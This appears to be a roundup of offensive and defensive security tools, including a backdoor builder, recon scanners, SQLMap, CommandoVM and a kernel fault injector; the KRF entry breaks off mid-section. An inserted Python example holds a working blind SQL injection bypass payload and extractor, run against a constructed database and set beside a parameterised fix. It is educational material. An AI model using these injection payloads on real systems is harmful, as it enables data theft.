AbsoluteZero is a Python APT backdoor, optimized as a Red Team post-exploitation tool. It can generate a binary payload or pure Python source. The final stub uses polymorphic encryption to give itself a first layer of obfuscation.

Deployment

AbsoluteZero is written entirely in Python 2.7 and works on both Windows and Linux. To get it working, install Python 2.7 and then install the dependencies listed in requirements.txt with pip. Remember that to compile binaries for Windows you have to run the entire software on a Microsoft platform, since PyInstaller does not support cross-platform compiling without using Wine. Make sure the Python installation folder is set to C:/Python27 to avoid binary compiling troubles.

Download AbsoluteZero

Osmedeus lets you automatically run a collection of awesome tools for reconnaissance and vulnerability scanning against a target.

Installation

    git clone https://github.com/j3ssie/Osmedeus
    cd Osmedeus
    ./install.sh

This installer only targets Kali Linux; check the Wiki page for other installation methods.

How to use

If you have no idea what you are doing, just type the command below, or check out the Advanced Usage section:

    ./osmedeus.py -t example.com

Using Docker

Check out docker-osmedeus by mabnavarrete for Docker installation, and the wiki for more detail.

Features

- Subdomain scan
- Subdomain takeover scan
- Screenshot the target
- Basic recon like Whois and Dig info
- Web technology detection
- IP discovery
- CORS scan
- SSL scan
- Wayback Machine discovery
- URL discovery
- Headers scan
- Port scan
- Vulnerability scan
- Separate workspaces to store all scan output and detailed logging
- REST API
- React web UI
- Support for continuous scan
- Slack notifications
- Easily view reports from the command line

Check this Wiki page for more detail about each module.

Example Commands

    # normal routine
    ./osmedeus.py -t example.com
    # normal routine but slow speed on subdomain module
    ./osmedeus.py -t example.com --slow 'subdomain'
    # direct mode examples
    ./osmedeus.py -m portscan -i "1.2.3.4/24"
    ./osmedeus.py -m portscan -I list_of_targets.txt -t result_folder
    ./osmedeus.py -m "portscan,vulnscan" -i "1.2.3.4/24" -t result_folder
    ./osmedeus.py -m "assets" -i "example.com"
    ./osmedeus.py -m "assets,dirb" -i "example.com"
    # report mode
    ./osmedeus.py -t example.com --report list
    ./osmedeus.py -t example.com --report sum
    ./osmedeus.py -t example.com -m subdomain --report short
    ./osmedeus.py -t example.com -m "subdomain, portscan" --report full

More options

Basic Usage
===========
    python3 osmedeus.py -t
    python3 osmedeus.py -T
    python3 osmedeus.py -m [-i |-I ] [-t workspace_name]
    python3 osmedeus.py --report -t [-m ]

Advanced Usage
==============
    [*] List all modules
    python3 osmedeus.py -M
    [*] List all report modes
    python3 osmedeus.py --report help
    [*] Running with a specific module
    python3 osmedeus.py -t -m -i
    [*] Example commands
    python3 osmedeus.py -m subdomain -t example.com
    python3 osmedeus.py -t example.com --slow "subdomain"
    python3 osmedeus.py -t sample2 -m vuln -i hosts.txt
    python3 osmedeus.py -t sample2 -m dirb -i /tmp/list_of_hosts.txt

Remote Options
==============
    --remote REMOTE   Remote address for the API (default: https://127.0.0.1:5000)
    --auth AUTH       Specify authentication, e.g. --auth="username:password";
                      see your config file for more detail (default: core/config.conf)
    --client          Just run the client side, in case you started the Flask server before

The API binds to loopback by default; if you expose it to a network, change the credentials in core/config.conf first and put TLS in front of it.

More options
============
    --update                              Update to the latest version from git
    -c CONFIG, --config CONFIG            Specify config file (default: core/config.conf)
    -w WORKSPACE, --workspace WORKSPACE   Custom workspace folder
    -f, --force                           Force the module to run again even if output exists
    -s, --slow "all"                      Run all modules in slow mode
    -s, --slow "subdomain"                Run only the subdomain module in slow mode
    --debug                               Just for debug purposes

Disclaimer

Most of this tool's work is done by the authors of the tools listed in CREDITS.md. I just put all the pieces together, plus some extra magic. This tool is for educational purposes only. You are responsible for your own actions. If you mess something up or break any laws while using this software, it's your fault, and your fault only.

Contribute: please take a look at CONTRIBUTING.md
Changelog: please take a look at CHANGELOG.md
Credits: please take a look at CREDITS.md
Contact: @j3ssiejjj

Download Osmedeus

Doing HTB or other CTF enumeration against targets with HTTP(S) can become trivial. It gets tiresome to always run the same scripts and tests on every box, e.g. nmap, nikto, dirb and so on. A one-click run against the target with automatic reports solves that. Furthermore, with a script the enumeration process can be optimized, saving the hacker time. This is what CPH:SEC WAES, or Web Auto Enum & Scanner, was created for. WAES runs four steps of scanning against the target (see below) to optimize the time spent scanning. While multi-core or multi-threaded scanning could be implemented, it would almost surely cause boxes to hang and so is undesirable. From the current version onward WAES includes an install script (see below) as the project moves from alpha to beta. WAES could have been developed in Python, but good bash projects are needed to learn bash. WAES is currently made for CTF boxes but is moving towards online use (see the To Do section).

To install:

    1. $> git clone https://github.com/Shiva108/WAES.git
    2. $> cd WAES
    3. $> sudo ./install.sh

Make sure the wordlist directories are set correctly in supergobuster.sh. This should be automatic on Kali and Parrot Linux.

Standard directories for lists: SecLists/Discovery/Web-Content and SecLists/Discovery/Web-Content/CMS
Kali / Parrot directory list: /usr/share/wordlists/dirbuster/

To run WAES

Web Auto Enum & Scanner: auto-enumerates website(s) and dumps files as the result.

    ########################################################################
    Web Auto Enum & Scanner
    Auto enums website(s) and dumps files as result
    ########################################################################
    Usage: waes.sh -u {IP}
           waes.sh -h
      -h  shows this help
      -u  IP to test, e.g. 10.10.10.123
      -p  port number (default=80)
    Example: ./waes.sh -u 10.10.10.130 -p 8080

Enumeration Process / Method

WAES runs the following against the target, dumping result files in the report/ folder:

Step 0 - Passive scan (disabled in the current version)
    whatweb - aggressive mode
    OSIRA (same author) - looks for subdomains
Step 1 - Fast scan
    wafw00f - firewall detection
    nmap with http-enum
Step 2 - In-depth scan
    nmap with NSE scripts: http-date, http-title, http-server-header, http-headers, http-enum, http-devframework, http-dombased-xss, http-stored-xss, http-xssed, http-cookie-flags, http-errors, http-grep, http-traceroute
    nmap with vulscan (CVSS 5.0+)
    nikto with evasion A and all CGI dirs
    uniscan with all tests except the stress test (qweds)
Step 3 - Fuzzing
    super gobuster: gobuster with multiple lists, dirb with multiple lists
    xss scan (to come)

To Do

    Implement domain as input
    Add XSS scan
    Add SSL/TLS scanning
    Add domain scans
    Add golismero
    Add dirble
    Add progress bar
    Add CMS detection
    Add CMS-specific scans

Download WAES

BADministration is a tool that interfaces with management or administration applications from an offensive standpoint. It attempts to give offsec personnel the ability to identify and leverage these non-technical vulnerabilities. As always: use for good, promote security, and fight application propagation.

Sorry for using Python 2.7; I found that a lot of the vendor APIs would only run on 2.7, and I'm not experienced enough to mix and match Python versions.

Application Propagation

In my opinion, we often do a fantastic job of network segmentation, and we're starting to catch on with domain segmentation; however, one area where I often see us fall down is application segmentation. Application segmentation is similar to network segmentation in that we're trying to reduce the exposure of a critical zone to a less trusted zone, should the latter be exploited. Administration applications often have privileged access to all of their clients: if an attacker lands on the administration application, there is a good chance all the clients can be exploited as well. Application segmentation tries to ensure that server-to-client relationships don't cross any trust boundaries. For example, if your admin network is trust level 100 and it is administered by your NMS server, your NMS server should be considered trust level 100.

References

    https://www.codeproject.com/Articles/716227/Csharp-How-to-Scan-a-Process-Memory
    http://www.exploit-monday.com/2012/03/powershell-live-memory-analysis-tools.html
    https://stackoverflow.com/questions/46440950/require-and-option-only-if-a-choice-is-made-when-using-click/46662521

Installation

There will be a collection of Python scripts, exes, and who knows what; for the central Python module it's pretty simple:

    pip install -r requirements.txt

Current Modules

SolarWinds Orion
    solarwinds-enum - enumerates the clients of Orion
    solarwinds-listalerts - lists Orion alerts and draws attention to malicious BADministration alerts
    solarwinds-alertremove - removes the malicious alert
    solarwinds-syscmd - executes a system command on the Orion server via a malicious alert

Standalone x64 .NET 4.5
    BADministration_SWDump.exe - scrapes memory for the WMI credentials used by Orion. Can consume large amounts of memory; use at your own risk. Compile as x64.

Check us out at https://ijustwannared.team, https://twitter.com/cpl3h and https://twitter.com/DarknessCherry

Download BADministration
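The trust-level rule from the Application Propagation section can be checked mechanically over an inventory. The following is an added example, not part of BADministration: the hosts, trust levels and admin relationships are constructed sample data, and the rule encoded is the one stated above (an administration server must be held to at least the trust level of everything it can reach through privileged access). It goes one step beyond the single NMS-to-admin-network case in the text by following admin relationships transitively, so a chain such as a monitoring server that manages a patch server that manages workstations is scored by the whole chain.

```python
from collections import deque

# Constructed sample inventory: host -> trust level (higher = more critical).
TRUST = {
    "nms01": 50,         # monitoring server sitting in the general server zone
    "dc01": 100,         # admin-zone assets nms01 polls with privileged credentials
    "fileserver": 100,
    "jumpbox": 100,
    "wsus": 50,
    "laptop-7": 10,
    "kiosk": 10,
}

# Constructed admin relationships: server -> clients it has privileged access to.
ADMINISTERS = {
    "nms01": ["dc01", "fileserver", "wsus"],
    "wsus": ["laptop-7", "kiosk"],
    "jumpbox": ["dc01"],
}


def crossing_edges(trust, administers):
    """Admin relationships where a server is trusted less than a client it controls."""
    return sorted(
        (server, client)
        for server, clients in administers.items()
        for client in clients
        if trust[server] < trust[client]
    )


def blast_radius(administers, start):
    """Every host an attacker can reach by hopping server -> client from `start`."""
    seen, queue = set(), deque([start])
    while queue:
        host = queue.popleft()
        for client in administers.get(host, ()):
            if client not in seen:
                seen.add(client)
                queue.append(client)
    return seen


def required_trust(trust, administers, host):
    """Trust level `host` must be held to: the maximum over itself and its blast radius."""
    return max(trust[h] for h in blast_radius(administers, host) | {host})


def report(trust=TRUST, administers=ADMINISTERS):
    """Admin servers whose actual trust level is below what their reach demands.

    Returns {server: (actual, required)}; an empty dict means no propagation path.
    """
    return {
        server: (trust[server], required_trust(trust, administers, server))
        for server in administers
        if trust[server] < required_trust(trust, administers, server)
    }


if __name__ == "__main__":
    for server, (actual, needed) in report().items():
        print("%s is trust %d but administers trust-%d assets: %s"
              % (server, actual, needed, sorted(blast_radius(ADMINISTERS, server))))
```

In the sample data only nms01 is flagged: it lives at trust 50 but, directly or through wsus, has privileged reach into trust-100 and trust-10 assets, so either it moves into the admin zone or its credentials to dc01 and fileserver go away.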

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

- Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
- Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
- Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
- Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
- Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
- Support to dump database tables entirely, a range of entries or specific columns as per the user's choice. The user can also choose to dump only a range of characters from each column's entry.
- Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where the relevant column names contain strings like name and pass.
- Support to download and upload any file from the database server's underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support to execute arbitrary commands and retrieve their standard output on the database server's underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server's underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per the user's choice.
- Support for database process user privilege escalation via Metasploit's Meterpreter getsystem command.

Installation

You can download the latest tarball or zipball from the project site. Preferably, download sqlmap by cloning the Git repository:

    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap works out of the box with Python version 2.6.x and 2.7.x on any platform.

Usage

To get a list of basic options and switches use:

    python sqlmap.py -h

To get a list of all options and switches use:

    python sqlmap.py -hh

You can find a sample run on the project site. To get an overview of sqlmap's capabilities, the list of supported features and a description of all options and switches, along with examples, consult the user's manual.

Links

    Homepage: http://sqlmap.org
    Download: .tar.gz or .zip
    Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
    Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
    User's manual: https://github.com/sqlmapproject/sqlmap/wiki
    Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
    Twitter: @sqlmap
    Demos: http://www.youtube.com/user/inquisb/videos
    Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

Translations: Bulgarian, Chinese, Croatian, French, Greek, Indonesian, Italian, Japanese, Portuguese, Spanish, Turkish

Download SQLMap v1.3.8
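The first technique in the feature list, boolean-based blind injection, is the one that works even when the application shows no query output at all. The following is an added example and not sqlmap's own code: it builds a constructed SQLite database with a deliberately injectable login check, the same check with bound parameters, and a small extractor that does what sqlmap does in blind mode, namely recovers a value the query never returns by asking one true/false question per character. Table name, column names and the secret are all made up for the demonstration.

```python
import sqlite3
import string

# Constructed sample data: one table, one secret the login query never returns.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users (username, password) VALUES ('admin', 's3cr3t!');
INSERT INTO users (username, password) VALUES ('alice', 'wonderland');
"""

# Characters tried per position. Quotes and backslashes are left out so a
# candidate can never break the payload's own string literal.
ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*()_-+=[]{};:,.<>?/~ "


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn, username, password):
    """Injectable: untrusted strings are spliced straight into the SQL text."""
    sql = ("SELECT id FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Same check with bound parameters: the input is data, never SQL."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def blind_extract(oracle, subquery, alphabet=ALPHABET, max_len=32):
    """Recover the single value `subquery` selects, using only a yes/no oracle.

    oracle(payload) must return True when the injected condition holds. The
    payload closes the username literal, ANDs a test on one character of the
    subquery's result, and comments out the rest of the original statement.
    """
    result = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            # SQLite substr() is 1-indexed; '-- ' comments out the password clause.
            payload = "admin' AND substr((%s),%d,1)='%s'-- " % (subquery, pos, ch)
            if oracle(payload):
                result += ch
                break
        else:
            break  # no candidate matched: we are past the end of the value
    return result


def demo():
    """Run the bypass and the blind extraction against both login variants."""
    conn = make_db()
    bypass = "admin'-- "
    secret = "SELECT password FROM users WHERE username='admin'"
    counter = {"queries": 0}

    def vuln_oracle(payload):
        counter["queries"] += 1
        return login_vulnerable(conn, payload, "wrong")

    return {
        "bypass_vulnerable": login_vulnerable(conn, bypass, "wrong"),
        "bypass_safe": login_safe(conn, bypass, "wrong"),
        "extracted_vulnerable": blind_extract(vuln_oracle, secret),
        "extracted_safe": blind_extract(lambda p: login_safe(conn, p, "wrong"), secret),
        "queries": counter["queries"],
    }


if __name__ == "__main__":
    print(demo())
```

Against the concatenating version the admin password comes back character by character from nothing but login success or failure; against the parameterised version the same payloads are just an unknown username and the extractor returns an empty string. The linear sweep over the alphabet is deliberately simple; sqlmap narrows each character with a much smaller number of requests, but the oracle it relies on is exactly this one.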

Welcome to CommandoVM, a fully customizable, Windows-based security distribution for penetration testing and red teaming. For detailed install instructions or more information please see our blog.

Installation (Install Script)

Requirements
    Windows 7 Service Pack 1 or Windows 10
    60 GB hard drive
    2 GB RAM

Recommended
    Windows 10
    80+ GB hard drive
    4+ GB RAM
    2 network adapters
    Virtualization support enabled for the VM (REQUIRED FOR KALI OR DOCKER)

Instructions

Standard install

1. Create and configure a new Windows virtual machine.
2. Ensure the VM is updated completely. You may have to check for updates, reboot, and check again until no more remain.
3. Take a snapshot of your machine!
4. Download and copy install.ps1 onto your newly configured machine.
5. Open PowerShell as an Administrator.
6. Enable script execution by running the following command:

    Set-ExecutionPolicy Unrestricted

7. Finally, execute the installer script as follows:

    .\install.ps1

You can also pass your password as an argument:

    .\install.ps1 -password

The script will set up the Boxstarter environment and proceed to download and install the Commando VM environment. You will be prompted for the administrator password in order to automate host restarts during installation. If you do not have a password set, hitting enter when prompted will also work.

Custom install

1. Download the zip from https://github.com/fireeye/commando-vm into your Downloads folder.
2. Decompress the zip and edit the ${Env:UserProfile}\Downloads\commando-vm-master\commando-vm-master\profile.json file by removing tools or adding tools in the "packages" section. Tools are available from our package list or from the Chocolatey repository.
3. Open an administrative PowerShell window and enable script execution:

    Set-ExecutionPolicy Unrestricted -f

4. Change to the unzipped project directory:

    cd ${Env:UserProfile}\Downloads\commando-vm-master\commando-vm-master

5. Execute the install with the -profile_file argument:

    .\install.ps1 -profile_file .\profile.json

For more detailed instructions about custom installations, see our blog.

Installing a new package

Commando VM uses the Chocolatey Windows package manager. It is easy to install a new package. For example, enter the following command as Administrator to deploy GitHub Desktop on your system:

    cinst github

Staying up to date

Type the following command to update all of the packages to the most recent version:

    cup all

Installed Tools

Active Directory Tools: Remote Server Administration Tools (RSAT), SQL Server Command Line Utilities, Sysinternals

Command & Control: Covenant, PoshC2, WMImplant, WMIOps

Developer Tools: Dep, Git, Go, Java, Python 2, Python 3 (default), Ruby, Ruby Devkit, Visual Studio 2017 Build Tools (Windows 10), Visual Studio Code

Docker: Amass, SpiderFoot

Evasion: CheckPlease, Demiguise, DefenderCheck, DotNetToJScript, Invoke-CradleCrafter, Invoke-DOSfuscation, Invoke-Obfuscation, Invoke-Phant0m, Not PowerShell (nps), PS>Attack, PSAmsi, Pafishmacro, PowerLessShell, PowerShdll, StarFighters

Exploitation: ADAPE-Script, API Monitor, CrackMapExec, CrackMapExecWin, DAMP, EvilClippy, Exchange-AD-Privesc, FuzzySec's PowerShell-Suite, FuzzySec's Sharp-Suite, Generate-Macro, GhostPack (Rubeus, SafetyKatz, Seatbelt, SharpDPAPI, SharpDump, SharpRoast, SharpUp, SharpWMI), GoFetch, Impacket, Invoke-ACLPwn, Invoke-DCOM, Invoke-PSImage, Invoke-PowerThIEf, Juicy Potato, Kali Binaries for Windows, LuckyStrike, MetaTwin, Metasploit, Mr. Un1k0d3r's RedTeamPowershellScripts, NetshHelperBeacon, Nishang, Orca, PSReflect, PowerLurk, PowerPriv, PowerSploit, PowerUpSQL, PrivExchange, RottenPotatoNG, Ruler, SharpClipHistory, SharpExchangePriv, SharpExec, SpoolSample, SharpSploit, UACME, impacket-examples-windows, vssown, Vulcan

Information Gathering: ADACLScanner, ADExplorer, ADOffline, ADRecon, BloodHound, dnsrecon, FOCA, Get-ReconInfo, GoBuster, GoWitness, NetRipper, Nmap, PowerView (Dev branch included), SharpHound, SharpView, SpoolerScanner, Watson

Kali Linux: kali-linux-default, kali-linux-xfce, VcXsrv

Networking Tools: Citrix Receiver, OpenVPN, Proxycap, PuTTY, Telnet, VMWare Horizon Client, VMWare vSphere Client, VNC-Viewer, WinSCP, Windump, Wireshark

Password Attacks: ASREPRoast, CredNinja, DomainPasswordSpray, DSInternals, Get-LAPSPasswords, Hashcat, Internal-Monologue, Inveigh, Invoke-TheHash, KeeFarce, KeeThief, LAPSToolkit, MailSniper, Mimikatz, Mimikittenz, RiskySPN, SessionGopher

Reverse Engineering: DNSpy, Flare-Floss, ILSpy, PEview, Windbg, x64dbg

Utilities: 7zip, Adobe Reader, AutoIT, Cmder, CyberChef, Explorer Suite, Gimp, Greenshot, Hashcheck, Hexchat, HxD, Keepass, MobaXterm, Mozilla Thunderbird, Neo4j Community Edition, Notepad++, Pidgin, Process Hacker 2, SQLite DB Browser, Screentogif, Shellcode Launcher, Sublime Text 3, TortoiseSVN, VLC Media Player, Winrar, yEd Graph Tool

Vulnerability Analysis: AD Control Paths, Egress-Assess, Grouper2, NtdsAudit, PwndPasswordsNTLM, zBang

Web Applications: Burp Suite, Fiddler, Firefox, OWASP Zap, Subdomain-Bruteforce, Wfuzz

Wordlists: FuzzDB, PayloadsAllTheThings, SecLists, Probable-Wordlists, RobotsDisallowed

Legal Notice

This download configuration script is provided to assist penetration testers in creating handy and versatile toolboxes for offensive engagements. It provides a convenient interface for them to obtain a useful set of pentesting tools directly from their original sources. Installation and use of this script is subject to the Apache 2.0 License. You as a user of this script must review, accept and comply with the license terms of each downloaded/installed package listed below. By proceeding with the installation, you are accepting the license terms of each package, and acknowledging that your use of each package will be subject to its respective license terms.

List of package licenses:

    http://technet.microsoft.com/en-us/sysinternals/bb469936
    https://github.com/stufus/ADOffline/blob/master/LICENCE.md
    https://github.com/HarmJ0y/ASREPRoast/blob/master/LICENSE
    https://github.com/BloodHoundAD/BloodHound/blob/master/LICENSE.md
    https://github.com/Arvanaghi/CheckPlease/blob/master/LICENSE
    https://github.com/cobbr/Covenant/blob/master/LICENSE
    https://github.com/byt3bl33d3r/CrackMapExec/blob/master/LICENSE
    https://github.com/Raikia/CredNinja/blob/master/LICENSE
    https://github.com/MichaelGrafnetter/DSInternals/blob/master/LICENSE.md
    https://github.com/tyranid/DotNetToJScript/blob/master/LICENSE
    https://github.com/FortyNorthSecurity/Egress-Assess/blob/master/LICENSE
    https://github.com/cobbr/Elite/blob/master/LICENSE
    https://github.com/GoFetchAD/GoFetch/blob/master/LICENSE.md
    http://www.gnu.org/licenses/gpl.html
    https://github.com/Kevin-Robertson/Inveigh/blob/master/LICENSE.md
    https://github.com/danielbohannon/Invoke-CradleCrafter/blob/master/LICENSE
    https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/LICENSE
    https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/LICENSE
    https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/LICENSE.md
    https://github.com/denandz/KeeFarce/blob/master/LICENSE
    https://github.com/HarmJ0y/KeeThief/blob/master/LICENSE
    https://github.com/gentilkiwi/mimikatz
    https://github.com/nettitude/PoshC2/blob/master/LICENSE
    https://github.com/Mr-Un1k0d3r/PowerLessShell/blob/master/LICENSE.md
    https://github.com/G0ldenGunSec/PowerPriv/blob/master/LICENSE
    https://github.com/p3nt4/PowerShdll/blob/master/LICENSE.md
    https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/LICENSE
    https://github.com/PowerShellMafia/PowerSploit/blob/master/LICENSE
    https://github.com/dirkjanm/PrivExchange/blob/master/LICENSE
    https://github.com/Mr-Un1k0d3r/RedTeamPowershellScripts/blob/master/LICENSE.md
    https://github.com/cyberark/RiskySPN/blob/master/LICENSE.md
    https://github.com/GhostPack/Rubeus/blob/master/LICENSE
    https://github.com/GhostPack/SafetyKatz/blob/master/LICENSE
    https://github.com/NickeManarin/ScreenToGif/blob/master/LICENSE.txt
    https://github.com/GhostPack/Seatbelt
    https://github.com/danielmiessler/SecLists/blob/master/LICENSE
    https://github.com/Arvanaghi/SessionGopher
    https://github.com/GhostPack/SharpDPAPI/blob/master/LICENSE
    https://github.com/GhostPack/SharpDump/blob/master/LICENSE
    https://github.com/tevora-threat/SharpView/blob/master/LICENSE
    https://github.com/GhostPack/SharpRoast/blob/master/LICENSE
    https://github.com/GhostPack/SharpUp/blob/master/LICENSE
    https://github.com/GhostPack/SharpWMI/blob/master/LICENSE
    https://github.com/leechristensen/SpoolSample/blob/master/LICENSE
    https://github.com/vletoux/SpoolerScanner/blob/master/LICENSE
    http://www.sublimetext.com/eula
    https://github.com/HarmJ0y/TrustVisualizer/blob/master/LICENSE
    https://github.com/hfiref0x/UACME/blob/master/LICENSE.md
    https://github.com/FortyNorthSecurity/WMIOps/blob/master/LICENSE
    https://github.com/FortyNorthSecurity/WMImplant/blob/master/LICENSE
    http://www.adobe.com/products/eulas/pdfs/Reader10_combined-20100625_1419.pdf
    http://www.rohitab.com/apimonitor
    http://www.autoitscript.com/autoit3/docs/license.htm
    https://portswigger.net/burp
    http://www.citrix.com/buy/licensing/agreements.html
    https://github.com/cmderdev/cmder/blob/master/LICENSE
    https://github.com/nccgroup/demiguise/blob/master/LICENSE.txt
    http://www.telerik.com/purchase/license-agreement/fiddler
    https://www.mozilla.org/en-US/MPL/2.0/
    https://github.com/fireeye/flare-floss
    https://github.com/fuzzdb-project/fuzzdb/blob/master/_copyright.txt
    https://www.gimp.org/about/
    https://www.google.it/intl/en/chrome/browser/privacy/eula_text.html
    https://github.com/sensepost/gowitness/blob/master/LICENSE.txt
    https://github.com/hashcat/hashcat/blob/master/docs/license.txt
    https://www.gnu.org/licenses/gpl-2.0.html
    https://mh-nexus.de/en/hxd/license.php
    https://github.com/SecureAuthCorp/impacket/blob/master/LICENSE
    https://www.kali.org/about-us/
    http://keepass.info/help/v2/license.html
    https://github.com/putterpanda/mimikittenz
    http://mobaxterm.mobatek.net/license.html
    http://neo4j.com/open-source-project/
    https://github.com/samratashok/nishang/blob/master/LICENSE
    https://svn.nmap.org/nmap/COPYING
    https://github.com/Ben0xA/nps/blob/master/LICENSE
    https://openvpn.net/index.php/license.html
    https://www.microsoft.com/en-us/servicesagreement/
    https://github.com/joesecurity/pafishmacro/blob/master/LICENSE
    https://hg.pidgin.im/pidgin/main/file/f02ebb71b5e3/COPYING
    http://www.proxycap.com/eula.pdf
    http://www.chiark.greenend.org.uk/~sgtatham/putty/licence.html
    https://support.microsoft.com/en-us/gp/mats_eula
    https://raw.githubusercontent.com/sqlitebrowser/sqlitebrowser/master/LICENSE
    http://www.mozilla.org/en-US/legal/eula/thunderbird.html
    http://www.videolan.org/legal.html
    http://www.vmware.com/download/eula/universal_eula.html
    https://www.vmware.com/help/legal.html
    https://www.realvnc.com/legal/
    https://code.visualstudio.com/License
    http://go.microsoft.com/fwlink/?LinkID=251960
    http://opensource.org/licenses/BSD-3-Clause
    https://winscp.net/docs/license
    http://www.gnu.org/copyleft/gpl.html
    https://github.com/x64dbg/x64dbg/blob/development/LICENSE
    https://www.yworks.com/products/yed/license.html
    http://www.apache.org/licenses/LICENSE-2.0
    https://github.com/Dionach/NtdsAudit/blob/master/LICENSE
    https://github.com/ANSSI-FR/AD-control-paths/blob/master/LICENSE.txt
    https://github.com/OJ/gobuster/blob/master/LICENSE
    https://github.com/xmendez/wfuzz/blob/master/LICENSE
    https://github.com/dafthack/DomainPasswordSpray/blob/master/LICENSE
    https://github.com/nettitude/PoshC2_Python/blob/master/LICENSE
    https://github.com/ElevenPaths/FOCA/blob/master/LICENSE.txt
    https://github.com/ohpe/juicy-potato/blob/master/LICENSE
    https://github.com/NytroRST/NetRipper/blob/master/LICENSE.TXT
    https://github.com/unixrox/prebellico/blob/master/LICENSE.md
    https://github.com/rasta-mouse/Watson/blob/master/LICENSE.txt
    https://github.com/berzerk0/Probable-Wordlists/blob/master/License.txt
    https://github.com/cobbr/SharpSploit/blob/master/LICENSE

Download Commando-Vm

Skadi (pronounced "SKAH-dee", similar to Scotty but with a d sound) is a giantess and goddess of hunting in Norse mythology.

Purpose

Skadi is a free, open source collection of tools that enables the collection, processing and advanced analysis of forensic artifacts and images. It works on macOS, Windows and Linux machines. It scales to work effectively on laptops, desktops, servers and the cloud, and can be installed on top of hardened / gold disk images.

How to Get Started and Support

Download the latest release, available in OVA, Vagrant and signed installer formats.

Installation instructions are available for each format: starting Skadi on Docker, Vagrant installation, OVA installation and the signed installer.

Skadi Portal

This portal allows easy access to the Skadi tools. By default it is available at the IP address of the Skadi server. The default credentials are:

    Username: skadi
    Password: skadi

Access the portal through a web browser at the IP address of the server. In this example the server is 192.168.1.2, while Vagrant and Docker will create a link to localhost.

    Example: http://192.168.1.2
    Vagrant example: http://localhost

Change these default credentials before the portal is reachable from anything other than your own machine; the Secure Networking add-on pack listed below covers the firewall and authenticated reverse proxy for network deployments.

Included Tools

The tools are combined into one platform that all work together to collect data, convert the bits and bytes to words and numbers, and analyze the results quickly and easily. This makes it possible to rapidly hunt for host-based evidence of malicious activity, quickly and accurately.

    CDQR
    CyberChef
    CyLR
    Docker
    ElasticSearch
    Glances
    Grafana
    Portainer
    Kibana
    Plaso
    TimeSketch
    Yeti (Threat Intelligence Tool)

Kibana and TimeSketch: 11 Kibana dashboards are included, alongside TimeSketch.

Videos and Media

- Alamo ISSA 2018 Slides: reviews the CCF-VM components, walks through how to install the GCP version and discusses automation possibilities and risks
- SANS DFIR Summit 2017 Video: a talk about using CCF-VM for Digital Forensics and Incident Response (DFIR)
- ISC2 Security Congress 2017 Slides: another talk about using CCF-VM for Digital Forensics and Incident Response (DFIR)
- DEFCON 25 4-hour Workshop 2017 Slides: Free and Easy DFIR Triage for Everyone
- OSDFCON 2017 Slides: walk-through of the different techniques required to produce forensic results for Windows and *nix environments (including CyLR and CDQR)

Skadi Wiki Page

The answers to common questions and information about how to get started with Skadi are stored in the Skadi Wiki pages.

Skadi Community

There is a Slack community set up for developers and users of the Skadi ecosystem. It is a safe place to ask questions and share information. Join the Skadi Community Slack.

Skadi Add-on Packs

Skadi add-on packs are installed on top of the base Skadi VM to provide extra functionality:

- Skadi Pack 01: Automation: provides two methods of integrating with any automation tool, a gRPC API or SSH
- Skadi Pack 02: Secure Networking: updates the firewall and authenticated reverse proxy for use in network deployments, and provides instructions for obtaining TLS/SSL certificates

Thank you to everyone who has helped, and those that continue to help, in making this project a reality. Special thanks to: the team from Komand for their advice and support on all things automation; Jackie & Jason from @SpyglassSec for their guidance; and every single one of the contributors whose efforts made the Automation add-on pack possible.

CREATOR: Alan Orlikoski

Download Skadi

KRF is a Kernelspace Randomized Faulter. It currently supports the Linux and FreeBSD kernels.

What?

Fault injection is a software testing technique that involves inducing failures ("faults") in the functions called by a program. If the caller has failed to perform proper error checking and handling, these faults can result in unreliable application behavior or exploitable vulnerabilities.

Unlike the many userspace fault injection systems out there, KRF runs in kernelspace via a loaded module. This has several advantages:

- It works on static binaries, as it does not rely on LD_PRELOAD for injection.
- Because it intercepts raw syscalls and not their libc wrappers, it can inject faults into calls made by syscall(3) or inline assembly.
- It's probably faster and less error-prone than futzing with dlsym.

There are also several disadvantages:

- You'll probably need to build it yourself.
- It probably only works on x86(_64), since it twiddles cr0 manually. There is probably an architecture-independent way to do that in Linux, somewhere.
- It's essentially a rootkit. You should definitely never, ever run it on a non-testing system.
- It probably doesn't cover everything that the Linux kernel expects of syscalls, and may destabilize its host in weird and difficult-to-reproduce ways.

How does it work?

